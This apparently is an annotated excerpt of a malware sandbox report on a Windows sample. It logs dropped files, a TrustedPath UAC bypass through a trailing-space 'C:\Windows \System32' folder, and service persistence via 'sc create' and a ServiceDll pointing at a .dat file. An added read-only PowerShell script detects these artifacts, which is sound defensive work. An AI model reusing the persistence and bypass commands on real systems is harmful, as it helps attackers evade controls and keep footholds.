Source: C:\Windows\System32\reg.exe Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x338625\Parameters ServiceDll C:\Windows\System32\x338625.dat
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows \System32\printui.exe
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\printui.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\x249569.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x338625.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\usvc.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll
Source: C:\Program Files\7-Zip\7zFM.exe File created: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\reg.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x338625\Parameters
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
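Two persistence artifacts stand out in the lines above. First, the copy of printui.exe is executed from "C:\Windows \System32\" (note the space after "Windows"), a mock trusted directory that xcopy.exe created; this is the pattern behind the TrustedPath UAC bypass signature in the overview. Second, the service x338625 is registered with binPath pointing at svchost.exe -k DcomLaunch, and its Parameters\ServiceDll is set by reg.exe to C:\Windows\System32\x338625.dat, a PE file with a non-DLL extension. For svchost.exe to host a service it must also be listed under the matching group name in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost; that write is not shown in this report excerpt, so it is worth checking on a live host rather than assumed. The script below is an added triage example, not code from the report or the sample; service, group and directory names come from the report, and it only reads and prints, it removes nothing.

```powershell
# Added triage script (not from the report or the sample). Run elevated.
# 1. svchost-hosted services whose ServiceDll is not a Microsoft-signed .dll
#    (the report shows x338625 -> C:\Windows\System32\x338625.dat).
# 2. Whether each such service is actually listed in the svchost group named
#    by its "-k" argument (DcomLaunch in the report).
# 3. Directories under the system drive root whose names end in a space,
#    such as "C:\Windows \" used to stage printui.exe.

$servicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$findings = @()

Get-ChildItem $servicesKey | ForEach-Object {
    $svc = Get-ItemProperty $_.PSPath -ErrorAction SilentlyContinue
    if (-not $svc.ImagePath -or $svc.ImagePath -notmatch 'svchost\.exe') { return }

    $params = Get-ItemProperty (Join-Path $_.PSPath 'Parameters') -ErrorAction SilentlyContinue
    if (-not $params -or -not $params.ServiceDll) { return }

    # ServiceDll is normally REG_EXPAND_SZ; expand anything still unexpanded.
    $dll = [Environment]::ExpandEnvironmentVariables($params.ServiceDll)
    $sig = if (Test-Path -LiteralPath $dll) { Get-AuthenticodeSignature -LiteralPath $dll } else { $null }
    $suspicious = (-not $sig) -or
                  ($sig.Status -ne 'Valid') -or
                  ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') -or
                  ([IO.Path]::GetExtension($dll) -ne '.dll')

    if ($suspicious) {
        $findings += [pscustomobject]@{
            Service    = $_.PSChildName
            ImagePath  = $svc.ImagePath
            Start      = $svc.Start        # 2 = auto, matching "start= auto"
            Type       = $svc.Type         # 16 (0x10) = own process, matching "type= own"
            ServiceDll = $dll
            SigStatus  = if ($sig) { $sig.Status } else { 'file missing' }
        }
    }
}
"Suspicious svchost-hosted services:"
$findings | Format-Table -AutoSize

# 2. svchost only hosts services named in the REG_MULTI_SZ for their group.
$groups = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost'
"DcomLaunch group members: $($groups.DcomLaunch -join ', ')"
foreach ($f in $findings) {
    if ($f.ImagePath -match '-k\s+(\S+)') {
        $grp = $Matches[1]
        if ($groups.$grp -notcontains $f.Service) {
            "  NOTE: $($f.Service) requests group '$grp' but is not listed in it; svchost will not load it as configured."
        }
    }
}

# 3. Mock trusted directories: names that differ from their trimmed form.
$root = [IO.Path]::GetPathRoot($env:SystemRoot)
Get-ChildItem -LiteralPath $root -Directory -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -ne $_.Name.TrimEnd() } |
    ForEach-Object { "Trailing-space directory (TrustedPath UAC bypass staging?): '$($_.FullName)'" }
```

A hit in the first table with SigStatus other than Valid, or a ServiceDll ending in .dat, is the strongest signal; a service that names a group it is not a member of is a configuration the operator may fix in a later stage, so treat it as evidence of tampering rather than as proof the service is inert. Trailing-space directories cannot be created or removed with plain cmd.exe syntax; inspect them with the \\?\ path prefix before deleting.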

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
